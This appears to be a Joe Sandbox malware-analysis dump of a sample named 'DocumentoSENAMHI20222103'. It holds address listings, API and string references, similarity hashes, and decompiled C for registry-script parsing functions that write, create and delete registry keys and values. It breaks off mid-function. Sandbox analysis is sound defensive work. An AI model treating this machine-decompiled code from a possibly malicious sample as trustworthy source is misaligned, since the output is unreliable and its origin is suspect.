0x00152a6e
0x00152a6e
0x00152a71
0x00152a74
0x00000000
0x00000000
0x00152a7a
0x00152a7c
0x00152ad4
0x00152ad4
0x00152ad6
0x00152ad9
0x00152b1f
0x00152b21
0x00000000
0x00000000
0x00000000
0x00000000
0x00152adb
0x00152adb
0x00152add
0x00152ae6
0x00152aec
0x00152aef
0x00152afe
0x00152b01
0x00152b10
0x00152b15
0x00152b17
0x00000000
0x00152b1d
0x00000000
0x00152b1d
0x00152af1
0x00152af1
0x00152b23
0x00152b25
0x00152b27
0x00152b29
0x00152b30
0x00152b33
0x00152b36
0x00152b38
0x00000000
0x00152b3a
0x00152b3a
0x00152b3d
0x00152b40
0x00152b42
0x00000000
0x00152b44
0x00152b44
0x00152b48
0x00000000
0x00152b4a
0x00152b4a
0x00152b52
0x00152b57
0x00152b59
0x00000000
0x00152b5f
0x00152b5f
0x00000000
0x00152b5f
0x00152b59
0x00152b48
0x00152b42
0x00152b2b
0x00152b2b
0x00000000
0x00152b2b
0x00152b29
0x00152adf
0x00152adf
0x00000000
0x00152adf
0x00152add
0x00152a7e
0x00152a84
0x00152a8b
0x00152a8d
0x00152ad1
0x00152ad1
0x00000000
0x00152a8f
0x00152a8f
0x00152a91
0x00000000
0x00152a93
0x00152a95
0x00152a9c
0x00152a9e
0x00152aa5
0x00152aa7
0x00152aae
0x00152ab0
0x00152ab6
0x00152abe
0x00152ac0
0x00152ac5
0x00152ac7
0x00000000
0x00152acd
0x00152acd
0x00000000
0x00152acd
0x00152ac7
0x00152a91
0x00152a8d
0x00000000
0x00152b62
0x00152b62
0x00152b64
0x00152b65
0x00152b68
0x00152b7a
0x00152b87
0x00152b8c
0x00152b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00152b6a
0x00152b70
0x00152b72
0x00152b74
0x00152b77
0x00152bc0
0x00152bc2
0x00152bc4
0x00152c24
0x00152c24
0x00152bc6
0x00152bc8
0x00152bca
0x00152bcd
0x00152c1d
0x00152bcf
0x00152bde
0x00152be9
0x00152bed
0x00152bf2
0x00152bf4
0x00000000
0x00152bf6
0x00152bf6
0x00152bfa
0x00152bff
0x00152c01
0x00000000
0x00152c07
0x00152c07
0x00152c14
0x00152c14
0x00152c16
0x00000000
0x00000000
0x00152c0c
0x00152c12
0x00152c12
0x00152b94
0x00152b9c
0x00152b9e
0x00152ba0
0x00152ba3
0x00000000
0x00152ba9
0x00152ba9
0x00152bac
0x00152baf
0x00000000
0x00152baf
0x00152ba3
0x00152c01
0x00152bf4
0x00152bcd
0x00152b79
0x00152b79
0x00000000
0x00152b79
0x00152b77
0x00000000
0x00152b68
0x00152a6e
0x00152a44
0x00152a44
0x00152a44
0x00152a44
0x00152c36
0x00152c39
0x00152c3f
0x00152c4d

APIs

__EH_prolog3_GS.LIBCMT ref: 001529EF
_strlen.LIBCMT ref: 00152A14
CoTaskMemAlloc.OLE32(00000000,00000040,00152C84,?,00000000,00000000,?), ref: 00152A2E
CharNextA.USER32(?,?,?,00000000), ref: 00152A95
CharNextA.USER32(00000000,?,?,?,00000000), ref: 00152A9E
CharNextA.USER32(00000000,?,?,?,00000000), ref: 00152AA7
CharNextA.USER32(00000000,?,?,?,00000000), ref: 00152AB0
CharNextA.USER32(?,?,?,00000000), ref: 00152AE6
CharNextA.USER32(?,?,?,00000000), ref: 00152AF8
CharNextA.USER32(00000000,?,?,?,00000000), ref: 00152B03
CharNextA.USER32(00000000,}},?,?,00000000), ref: 00152B6A
CharNextA.USER32(?), ref: 00152B7A
CharNextA.USER32(?,?,00000000), ref: 00152B96
__cftof.LIBCMT ref: 00152BD8
CharNextA.USER32(00000000,00000000,?,?,?,00151D41,?,?), ref: 00152C0C
CoTaskMemFree.OLE32(?), ref: 00152C39

Strings

HKCU{Software{Classes, xrefs: 00152AB6
}}, xrefs: 00152B4A
HKCR, xrefs: 00152A7E

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CharNext$Task$AllocFreeH_prolog3___cftof_strlen
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 4131663743-1142484189
Opcode ID: 9dacc30c20ab41e87d725952905b4212c36fa4cd7d99d26430c01016cf8d82fd
Instruction ID: da890aed9fd435bf33920d43b9429e6370b7d98c1e55636880007a468e5e950d
Opcode Fuzzy Hash: 9dacc30c20ab41e87d725952905b4212c36fa4cd7d99d26430c01016cf8d82fd
Instruction Fuzzy Hash: D171A472904246EFDF259F74DC946ADBBB4AF26302F240019FC61EB252EB749C89CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00152DA0 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00152DA0(intOrPtr __ecx, void* __edx, char* _a4, void* _a8, void* _a12, void* _a16) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v4376;
				intOrPtr _v4380;
				int _v4384;
				void* _v4388;
				signed int _v4392;
				int _v4396;
				signed int _v4400;
				int _v4404;
				void* _v4408;
				signed int _v4412;
				void* _v4416;
				void* _v4420;
				signed int _v4424;
				signed int _v4428;
				signed int _v4432;
				signed int _v4436;
				signed int _v4440;
				void* _v4444;
				char _v4448;
				signed int _v4452;
				signed int _v4456;
				signed int _v4460;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed int _t132;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t152;
				void* _t157;
				void* _t159;
				void* _t162;
				void* _t165;
				void* _t167;
				void* _t169;
				void* _t171;
				void* _t172;
				void* _t179;
				void* _t180;
				void* _t190;
				void* _t197;
				void* _t198;
				void* _t199;
				signed int _t225;
				char* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				signed int _t251;
				void* _t252;

				_t240 = __edx;
				_push(0xffffffff);
				_push(0x160906);
				_push( *[fs:0x0]);
				E001602C0(0x115c);
				_t131 =  *0x169008; // 0x26a91022
				_t132 = _t131 ^ _t251;
				_v20 = _t132;
				_push(_t132);
				 *[fs:0x0] =  &_v16;
				_v4380 = __ecx;
				_t242 = _a4;
				_v4388 = _a8;
				_t197 = 0;
				_v4400 = 0;
				_v4404 = 0;
				_v4396 = 0;
				_v8 = 0;
				_t245 = E00152327(__ecx, _t242);
				if(_t245 < 0) {
					L89:
					 *[fs:0x0] = _v16;
					_pop(_t243);
					_pop(_t246);
					_pop(_t198);
					return E0015403C(_t245, _t198, _v20 ^ _t251, _t240, _t243, _t246);
				} else {
					while( *_t242 != 0x7d) {
						_v4384 = 1;
						lstrcmpiA(_t242, "Delete");
						asm("sbb esi, esi");
						_t247 = _t245 + 1;
						_v4392 = _t247;
						_t140 = lstrcmpiA(_t242, "ForceRemove");
						__eflags = _t140;
						if(_t140 == 0) {
							L4:
							_t245 = E00152327(_v4380, _t242);
							__eflags = _t245;
							if(_t245 < 0) {
								L87:
								if(_t197 != 0) {
									RegCloseKey(_t197);
								}
								goto L89;
							}
							_t248 = 0;
							__eflags = _a12;
							if(_a12 == 0) {
								L15:
								_t143 = lstrcmpiA(_t242, "NoRemove");
								__eflags = _t143;
								if(_t143 != 0) {
									L17:
									_t144 = lstrcmpiA(_t242, "Val");
									__eflags = _t144;
									if(_t144 != 0) {
										_t240 = 0x5c;
										_t145 = E001522D6(_t242, 0x5c);
										__eflags = _t145;
										if(_t145 != 0) {
											L86:
											_t245 = 0x80020009;
											goto L87;
										}
										__eflags = _a12 - _t145;
										if(_a12 == _t145) {
											__eflags = _a16;
											if(_a16 != 0) {
												_t146 = 2;
											} else {
												_t146 = E00151629( &_v4404, _v4388, _t242, 0x20019);
												_t197 = _v4404;
											}
											_v4392 = _t146;
											__eflags = _t146;
											_t212 =  ==  ? _a16 : 1;
											_v4420 =  ==  ? _a16 : 1;
											E00151285(E0015770F( &_v280, 0x104, _t242, 0xffffffff));
											_t252 = _t252 + 0x14;
											_t245 = E00152327(_v4380, _t242);
											__eflags = _t245;
											if(_t245 < 0) {
												goto L87;
											} else {
												_t214 = _v4380;
												_t245 = E0015297D(_t197, _v4380, _t240, _t242);
												__eflags = _t245;
												if(_t245 < 0) {
													goto L87;
												}
												__eflags =  *_t242 - 0x7b;
												if( *_t242 != 0x7b) {
													L67:
													_t152 = _v4392;
													__eflags = _t152 - 2;
													if(_t152 == 2) {
														continue;
													}
													__eflags = _t152;
													if(_t152 == 0) {
														__eflags = _a16;
														if(_a16 == 0) {
															L76:
															_t225 = E00152948(_t214, _t197);
															_t152 = 0;
															_v4392 = _t225;
															__eflags = _t197;
															if(_t197 != 0) {
																_t152 = RegCloseKey(_t197);
																_t225 = _v4392;
																_t197 = 0;
																__eflags = 0;
																_v4404 = 0;
															}
															_v4400 = _v4400 & 0x00000000;
															__eflags = _t152;
															if(_t152 != 0) {
																L48:
																_t245 = E001512D7(_t152);
																goto L87;
															} else {
																__eflags = _v4384 - _t152;
																if(_v4384 == _t152) {
																	continue;
																}
																__eflags = _t225;
																if(_t225 != 0) {
																	continue;
																}
																_v4456 = _v4456 & _t225;
																_v4452 = _v4452 & _t225;
																_v4460 = _v4388;
																_t152 = E00151596( &_v4460,  &_v280);
																_v4460 = _v4460 & 0x00000000;
																__eflags = _t152;
																if(_t152 != 0) {
																	goto L48;
																}
																continue;
															}
														}
														_t157 = E00152948(_t214, _t197);
														__eflags = _t157;
														if(_t157 == 0) {
															goto L76;
														}
														_t159 = E00152919( &_v280);
														__eflags = _t159;
														if(_t159 != 0) {
															__eflags = _v4384;
															if(__eflags != 0) {
																E00151685( &_v4404, _t240, _t242, __eflags,  &_v280);
																_t197 = _v4404;
															}
														}
														continue;
													}
													__eflags = _a16;
													if(_a16 == 0) {
														goto L48;
													}
													continue;
												}
												_t162 = E001574D0(_t242);
												_pop(_t214);
												__eflags = _t162 - 1;
												if(_t162 != 1) {
													goto L67;
												}
												_t245 = E00152DA0(_v4380, _t240, _t242, _t197, 0, _v4420);
												__eflags = _t245;
												if(_t245 >= 0) {
													L66:
													_t214 = _v4380;
													_t245 = E00152327(_v4380, _t242);
													__eflags = _t245;
													if(_t245 < 0) {
														goto L87;
													}
													goto L67;
												}
												__eflags = _v4420;
												if(_v4420 == 0) {
													goto L87;
												}
												goto L66;
											}
										}
										_t199 = _v4388;
										_t165 = E00151629( &_v4404, _t199, _t242, 0x2001f);
										__eflags = _t165;
										if(_t165 == 0) {
											L49:
											_t197 = _v4404;
											L50:
											_t245 = E00152327(_v4380, _t242);
											__eflags = _t245;
											if(_t245 < 0) {
												goto L87;
											}
											__eflags =  *_t242 - 0x3d;
											if( *_t242 != 0x3d) {
												L53:
												__eflags =  *_t242 - 0x7b;
												if( *_t242 != 0x7b) {
													continue;
												}
												_t167 = E001574D0(_t242);
												__eflags = _t167 - 1;
												if(_t167 != 1) {
													continue;
												}
												_t245 = E00152DA0(_v4380, _t240, _t242, _t197, _a12, 0);
												__eflags = _t245;
												if(_t245 < 0) {
													goto L87;
												}
												_t169 = E00152327(_v4380, _t242);
												L33:
												_t245 = _t169;
												__eflags = _t245;
												if(_t245 < 0) {
													goto L87;
												}
												continue;
											}
											_t171 = E00152440(_v4380,  &_v4404, 0, _t242);
											_t197 = _v4404;
											_t245 = _t171;
											__eflags = _t245;
											if(_t245 < 0) {
												goto L87;
											}
											goto L53;
										}
										_t172 = E00151629( &_v4404, _t199, _t242, 0x20019);
										__eflags = _t172;
										if(_t172 == 0) {
											goto L49;
										}
										_t235 = _v4396;
										_push( &_v4448);
										_v4384 = 0;
										_push( &_v4384);
										__eflags = _v4396;
										if(_v4396 == 0) {
											_t152 = RegCreateKeyExA(_t199, _t242, 0, 0, 0, 0x2001f, 0, ??, ??);
										} else {
											_t252 = _t252 - 0x14;
											_push(_t242);
											_push(_t199);
											_t152 = E00151348(_t235);
										}
										__eflags = _t152;
										if(_t152 != 0) {
											_t197 = _v4404;
										} else {
											_t152 = 0;
											__eflags = _v4404;
											if(_v4404 != 0) {
												_t152 = RegCloseKey(_v4404);
											}
											_t197 = _v4384;
											_v4404 = _t197;
											_v4400 = 0;
										}
										__eflags = _t152;
										if(_t152 == 0) {
											goto L50;
										} else {
											goto L48;
										}
									}
									_t245 = E00152327(_v4380,  &_v4376);
									__eflags = _t245;
									if(_t245 < 0) {
										goto L87;
									}
									_t245 = E00152327(_v4380, _t242);
									__eflags = _t245;
									if(_t245 < 0) {
										goto L87;
									}
									__eflags =  *_t242 - 0x3d;
									if( *_t242 != 0x3d) {
										goto L86;
									}
									__eflags = _a12;
									if(_a12 == 0) {
										__eflags = _a16;
										if(_a16 != 0) {
											L32:
											_t169 = E0015297D(_t197, _v4380, _t240, _t242);
											goto L33;
										}
										__eflags = _v4384;
										if(_v4384 == 0) {
											goto L32;
										}
										_v4416 = 0;
										_v4412 = 0;
										_v4408 = 0;
										_t179 = E00151629( &_v4416, _v4388, 0, 0x20006);
										__eflags = _t179;
										if(_t179 != 0) {
											L84:
											_t180 = E001512D7(_t179);
											__eflags = _v4416;
											_t245 = _t180;
											if(_v4416 != 0) {
												RegCloseKey(_v4416);
											}
											goto L87;
										}
										_t250 = _v4416;
										_t179 = RegDeleteValueA(_t250,  &_v4376);
										__eflags = _t179;
										if(_t179 == 0) {
											L29:
											__eflags = _t250;
											if(_t250 != 0) {
												RegCloseKey(_t250);
												_t59 =  &_v4416;
												 *_t59 = _v4416 & 0x00000000;
												__eflags =  *_t59;
											}
											_t61 =  &_v4412;
											 *_t61 = _v4412 & 0x00000000;
											__eflags =  *_t61;
											goto L32;
										}
										__eflags = _t179 - 2;
										if(_t179 != 2) {
											goto L84;
										}
										goto L29;
									}
									_v8 = 1;
									_v4440 = _v4440 & 0x00000000;
									_v4436 = _v4436 & 0x00000000;
									_v4444 = _v4388;
									_t245 = E00152440(_v4380,  &_v4444,  &_v4376, _t242);
									_v4444 = 0;
									_v4440 = 0;
									_v4436 = 0;
									__eflags = _t245;
									if(_t245 < 0) {
										goto L87;
									}
									_v8 = 0;
									_v4440 = 0;
									goto L53;
								}
								_v4384 = _t248;
								_t245 = E00152327(_v4380, _t242);
								__eflags = _t245;
								if(_t245 < 0) {
									goto L87;
								}
								goto L17;
							}
							_t240 = 0x5c;
							_v4432 = 0;
							_v4424 = 0;
							_t190 = E001522D6(_t242, 0x5c);
							__eflags = _t190;
							if(_t190 != 0) {
								goto L86;
							} else {
								__eflags = E00152919(_t242);
								if(__eflags != 0) {
									_v4432 = _v4388;
									_v4428 = 0;
									E00151685( &_v4432, 0x5c, _t242, __eflags, _t242);
									_v4432 = 0;
									_v4424 = 0;
								}
								__eflags = _v4392 - _t248;
								if(_v4392 == _t248) {
									_v4428 = _t248;
									goto L15;
								}
								_t245 = E00152327(_v4380, _t242);
								__eflags = _t245;
								if(_t245 < 0) {
									goto L87;
								}
								_t245 = E0015297D(_t197, _v4380, _t240, _t242);
								__eflags = _t245;
								if(_t245 < 0) {
									goto L87;
								}
								_v4428 = _v4428 & 0x00000000;
								goto L53;
							}
						}
						__eflags = _t247;
						if(_t247 == 0) {
							_t248 = 0;
							__eflags = 0;
							goto L15;
						}
						goto L4;
					}
					goto L87;
				}
			}

0x00152da0
0x00152da3
0x00152da5
0x00152db0
0x00152db6
0x00152dbb
0x00152dc0
0x00152dc2
0x00152dc8
0x00152dcc
0x00152dd4
0x00152ddd
0x00152de0
0x00152de8
0x00152dea
0x00152df0
0x00152df6
0x00152dfc
0x00152e07
0x00152e0b
0x001533e4
0x001533e9
0x001533f1
0x001533f2
0x001533f3
0x001533ff
0x00152e11
0x001533a9
0x00152e1c
0x00152e26
0x00152e33
0x00152e35
0x00152e37
0x00152e3d
0x00152e43
0x00152e45
0x00152e4f
0x00152e5b
0x00152e5d
0x00152e5f
0x001533d9
0x001533db
0x001533de
0x001533de
0x00000000
0x001533db
0x00152e65
0x00152e67
0x00152e6a
0x00152f0b
0x00152f11
0x00152f17
0x00152f19
0x00152f37
0x00152f3d
0x00152f43
0x00152f45
0x00153087
0x0015308b
0x00153090
0x00153092
0x001533d4
0x001533d4
0x00000000
0x001533d4
0x00153098
0x0015309b
0x001531ea
0x001531ee
0x00153211
0x001531f0
0x00153202
0x00153207
0x00153207
0x00153214
0x0015321d
0x00153220
0x00153230
0x0015323c
0x00153247
0x00153250
0x00153252
0x00153254
0x00000000
0x0015325a
0x0015325a
0x00153266
0x00153268
0x0015326a
0x00000000
0x00000000
0x00153270
0x00153273
0x001532bf
0x001532bf
0x001532c5
0x001532c8
0x00000000
0x00000000
0x001532ce
0x001532d0
0x001532e1
0x001532e5
0x0015332c
0x00153332
0x00153334
0x00153336
0x0015333c
0x0015333e
0x00153341
0x00153347
0x0015334d
0x0015334d
0x0015334f
0x0015334f
0x00153355
0x0015335c
0x0015335e
0x00153150
0x00153157
0x00000000
0x00153364
0x00153364
0x0015336a
0x00000000
0x00000000
0x0015336c
0x0015336e
0x00000000
0x00000000
0x00153376
0x0015337c
0x00153388
0x00153395
0x0015339a
0x001533a1
0x001533a3
0x00000000
0x00000000
0x00000000
0x001533a3
0x0015335e
0x001532e8
0x001532ed
0x001532ef
0x00000000
0x00000000
0x001532f8
0x001532fd
0x001532ff
0x00153305
0x0015330c
0x0015331f
0x00153324
0x00153324
0x0015330c
0x00000000
0x001532ff
0x001532d2
0x001532d6
0x00000000
0x00000000
0x00000000
0x001532dc
0x00153276
0x0015327b
0x0015327c
0x0015327f
0x00000000
0x00000000
0x00153296
0x00153298
0x0015329a
0x001532a9
0x001532a9
0x001532b5
0x001532b7
0x001532b9
0x00000000
0x00000000
0x00000000
0x001532b9
0x0015329c
0x001532a3
0x00000000
0x00000000
0x00000000
0x001532a3
0x00153254
0x001530a1
0x001530b4
0x001530b9
0x001530bb
0x0015315e
0x0015315e
0x00153164
0x00153170
0x00153172
0x00153174
0x00000000
0x00000000
0x0015317a
0x0015317d
0x001531a4
0x001531a4
0x001531a7
0x00000000
0x00000000
0x001531ae
0x001531b4
0x001531b7
0x00000000
0x00000000
0x001531cf
0x001531d1
0x001531d3
0x00000000
0x00000000
0x001531e0
0x00153078
0x00153078
0x0015307a
0x0015307c
0x00000000
0x00000000
0x00000000
0x00153082
0x0015318f
0x00153194
0x0015319a
0x0015319c
0x0015319e
0x00000000
0x00000000
0x00000000
0x0015319e
0x001530ce
0x001530d3
0x001530d5
0x00000000
0x00000000
0x001530db
0x001530e7
0x001530f0
0x001530f6
0x001530f7
0x001530f9
0x00153112
0x001530fb
0x001530fb
0x001530fe
0x001530ff
0x00153100
0x00153100
0x00153118
0x0015311a
0x00153146
0x0015311c
0x0015311c
0x0015311e
0x00153124
0x0015312c
0x0015312c
0x00153132
0x00153138
0x0015313e
0x0015313e
0x0015314c
0x0015314e
0x00000000
0x00000000
0x00000000
0x00000000
0x0015314e
0x00152f5d
0x00152f5f
0x00152f61
0x00000000
0x00000000
0x00152f73
0x00152f75
0x00152f77
0x00000000
0x00000000
0x00152f7d
0x00152f80
0x00000000
0x00000000
0x00152f86
0x00152f8a
0x00152ff0
0x00152ff4
0x0015306c
0x00153073
0x00000000
0x00153073
0x00152ff6
0x00152ffd
0x00000000
0x00000000
0x00153013
0x00153019
0x0015301f
0x00153025
0x0015302a
0x0015302c
0x001533b4
0x001533b6
0x001533bb
0x001533c2
0x001533c4
0x001533cc
0x001533cc
0x00000000
0x001533c4
0x00153032
0x00153040
0x00153046
0x00153048
0x00153053
0x00153053
0x00153055
0x00153058
0x0015305e
0x0015305e
0x0015305e
0x0015305e
0x00153065
0x00153065
0x00153065
0x00000000
0x00153065
0x0015304a
0x0015304d
0x00000000
0x00000000
0x00000000
0x0015304d
0x00152f98
0x00152f9c
0x00152fa3
0x00152faa
0x00152fc4
0x00152fc8
0x00152fce
0x00152fd4
0x00152fda
0x00152fdc
0x00000000
0x00000000
0x00152fe2
0x00152fe5
0x00000000
0x00152fe5
0x00152f22
0x00152f2d
0x00152f2f
0x00152f31
0x00000000
0x00000000
0x00000000
0x00152f31
0x00152e70
0x00152e72
0x00152e7a
0x00152e80
0x00152e85
0x00152e87
0x00000000
0x00152e8d
0x00152e93
0x00152e95
0x00152ea4
0x00152eaa
0x00152eb0
0x00152eb5
0x00152ebb
0x00152ebb
0x00152ec1
0x00152ec7
0x00152f01
0x00000000
0x00152f01
0x00152ed5
0x00152ed7
0x00152ed9
0x00000000
0x00000000
0x00152eeb
0x00152eed
0x00152eef
0x00000000
0x00000000
0x00152ef5
0x00000000
0x00152ef5
0x00152e87
0x00152e47
0x00152e49
0x00152f09
0x00152f09
0x00000000
0x00152f09
0x00000000
0x00152e49
0x00000000
0x001533b2

APIs

Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015235A
Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015236A
Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152379
Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152383
Part of subcall function 00152327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523D5

lstrcmpiA.KERNEL32 ref: 00152E26
lstrcmpiA.KERNEL32(?,ForceRemove), ref: 00152E3D
_strlen.LIBCMT ref: 001531AE
RegCloseKey.ADVAPI32(00000000,?), ref: 001533DE

Strings

NoRemove, xrefs: 00152F0B
Val, xrefs: 00152F37
Delete, xrefs: 00152E16
ForceRemove, xrefs: 00152E2E

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CharNext$lstrcmpi$Close_strlen
String ID: Delete$ForceRemove$NoRemove$Val
API String ID: 3980308911-1781481701
Opcode ID: 9dc49bd4acd923b3792355d87fff971c57ede03e38f11d163c5b6703db501403
Instruction ID: f4737f948cc7fdff86fdd01eba871ae08a764d7df39249de47edfdba3fc33645
Opcode Fuzzy Hash: 9dc49bd4acd923b3792355d87fff971c57ede03e38f11d163c5b6703db501403
Instruction Fuzzy Hash: 66F16571D00229DBCB399B618C45BEEB6B4BF55792F000199EE35AB241DB748F89CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00152440 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 353
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00152440(int __ecx, void** _a4, char* _a8, intOrPtr _a12) {
				int _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v4120;
				char _v4376;
				int _v4380;
				int _v4384;
				int _v4388;
				char _v4392;
				char* _v4396;
				void** _v4400;
				int _v4404;
				char _v4408;
				intOrPtr _v4412;
				void* _v4428;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t95;
				signed int _t96;
				char* _t106;
				int _t109;
				char* _t112;
				char* _t113;
				signed char _t115;
				char* _t118;
				signed char _t124;
				char* _t129;
				char* _t132;
				char* _t133;
				intOrPtr _t134;
				char* _t142;
				void* _t147;
				void* _t152;
				long _t154;
				CHAR* _t155;
				char* _t157;
				char _t158;
				int _t162;
				void* _t163;
				char* _t164;
				int _t165;
				char* _t166;
				char* _t179;
				void* _t185;
				char _t201;
				void** _t208;
				void* _t209;
				char* _t214;
				char* _t215;
				char* _t216;
				CHAR* _t217;
				int _t218;
				char* _t220;
				void* _t221;
				int _t223;
				char* _t225;
				char* _t226;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t231;

				_push(0xffffffff);
				_push(0x16088d);
				_push( *[fs:0x0]);
				_push(__ecx);
				E001602C0(0x1128);
				_t95 =  *0x169008; // 0x26a91022
				_t96 = _t95 ^ _t227;
				_v24 = _t96;
				_push(_t96);
				 *[fs:0x0] =  &_v16;
				_v20 = _t228;
				_v4404 = __ecx;
				_t162 = 0;
				_t208 = _a4;
				_t220 = _a8;
				_v4412 = _a12;
				_v4388 = __ecx;
				_v4400 = _t208;
				_v4396 = _t220;
				_v4384 = 0;
				if(E00152327(__ecx,  &_v4120) >= 0) {
					_t203 =  &_v4384;
					if(E001521F6( &_v4120, _t203) != 0) {
						E001522FE(_v4404);
						_t100 = E00152327(_v4404,  &_v4120);
						__eflags = _t100;
						if(_t100 >= 0) {
							_t106 = (_v4384 & 0x0000ffff) - 8;
							__eflags = _t106;
							if(_t106 == 0) {
								_t109 = E001574D0( &_v4120) + 1;
								__eflags = _t109;
								_t164 = RegSetValueExA( *_t208, _t220, 0, 1,  &_v4120, _t109);
								goto L62;
							} else {
								_t113 = _t106 - 9;
								__eflags = _t113;
								if(_t113 == 0) {
									_t115 = E001574D0( &_v4120);
									_v4384 = _t115;
									__eflags = _t115 & 0x00000001;
									if((_t115 & 0x00000001) != 0) {
										L54:
										_t100 = 0x80004005;
									} else {
										asm("cdq");
										_v4380 = 0;
										_t223 = _t115 - _t203 >> 1;
										_v4392 = _t223;
										_v8 = 4;
										_v8 = 5;
										__eflags = E00153D42(_t223) - 0x100;
										if(__eflags <= 0) {
											_t118 =  &_v4376;
											_v4380 = _t118;
										} else {
											E00153D1D( &_v4380, _t223, __eflags, _t117);
											_t118 = _v4380;
										}
										__eflags = _t118;
										if(_t118 != 0) {
											E00155210(_t208, _t118, _t162, _t223);
											_v4388 = _t162;
											__eflags = _v4384;
											_t203 = _t162;
											if(_v4384 > 0) {
												_t165 = _v4384;
												do {
													_t124 = E00152256();
													_t185 = 4;
													 *((_t203 >> 1) + _v4380) =  *((_t203 >> 1) + _v4380) | _t124 << _t185 - ((_t203 & 0x00000001) << 0x00000002);
													_t203 =  &(_v4388[1]);
													_v4388 = _t203;
													__eflags = _t203 - _t165;
												} while (_t203 < _t165);
												_t223 = _v4392;
												_t162 = 0;
												__eflags = 0;
											}
											_t164 = RegSetValueExA( *_v4400, _v4396, _t162, 3, _v4380, _t223);
											__eflags = _v4380 -  &_v4376;
											if(_v4380 !=  &_v4376) {
												E00153D14( &_v4380);
											}
											goto L62;
										} else {
											E00153D14( &_v4380);
											goto L54;
										}
									}
								} else {
									_t129 = _t113;
									__eflags = _t129;
									if(_t129 == 0) {
										_t225 = 0;
										_v4388 = 0;
										_v8 = 3;
										_t132 = E001574D0( &_v4120) + 1;
										_t203 = _t132;
										_v4384 = _t132;
										_t133 = E00151181( &_v4384, _t132);
										_t231 = _t228 + 4;
										__eflags = _t133;
										if(_t133 < 0) {
											L39:
											_t100 = 0x8007000e;
										} else {
											_t212 = _v4384;
											__eflags = _v4384 - 0x400;
											if(__eflags > 0) {
												L35:
												_t134 = E00153CD7( &_v4388, _t225, _t212);
												_t225 = _v4388;
											} else {
												_t142 = E001511AE(0, _t212, _t212, 0, __eflags);
												__eflags = _t142;
												if(_t142 == 0) {
													goto L35;
												} else {
													E001602F0(_t212);
													_v20 = _t231;
													_t134 = _t231;
												}
											}
											_t203 =  &_v4120;
											_t100 = E0015121E(_t134,  &_v4120, _t212 >> 1, 3);
											__eflags = _t100;
											if(_t100 != 0) {
												__imp__#277(_t100, _t162, _t162,  &_v4408);
												_v4392 = _t100;
												__eflags = _t100;
												if(_t100 >= 0) {
													_v4392 = _v4408;
													_t164 = RegSetValueExA( *_v4400, _v4396, _t162, 4,  &_v4392, 4);
													__eflags = _t225;
													if(_t225 != 0) {
														do {
															_t214 =  *_t225;
															_t225 = _t214;
															E00157188(_t225);
															__eflags = _t214;
														} while (_t214 != 0);
													}
													goto L62;
												} else {
													__eflags = _t225;
													if(_t225 != 0) {
														do {
															_t215 =  *_t225;
															_t225 = _t215;
															E00157188(_t225);
															__eflags = _t215;
														} while (_t215 != 0);
														_t100 = _v4392;
													}
												}
											} else {
												__eflags = _t225;
												if(_t225 != 0) {
													do {
														_t216 =  *_t225;
														_t225 = _t216;
														E00157188(_t225);
														__eflags = _t216;
													} while (_t216 != 0);
												}
												goto L39;
											}
										}
									} else {
										__eflags = _t129 != 0x3ff5;
										if(_t129 != 0x3ff5) {
											L64:
											_t112 = E00152327(_v4404, _v4412);
											__eflags = _t112;
											_t179 =  <  ? _t112 : 0;
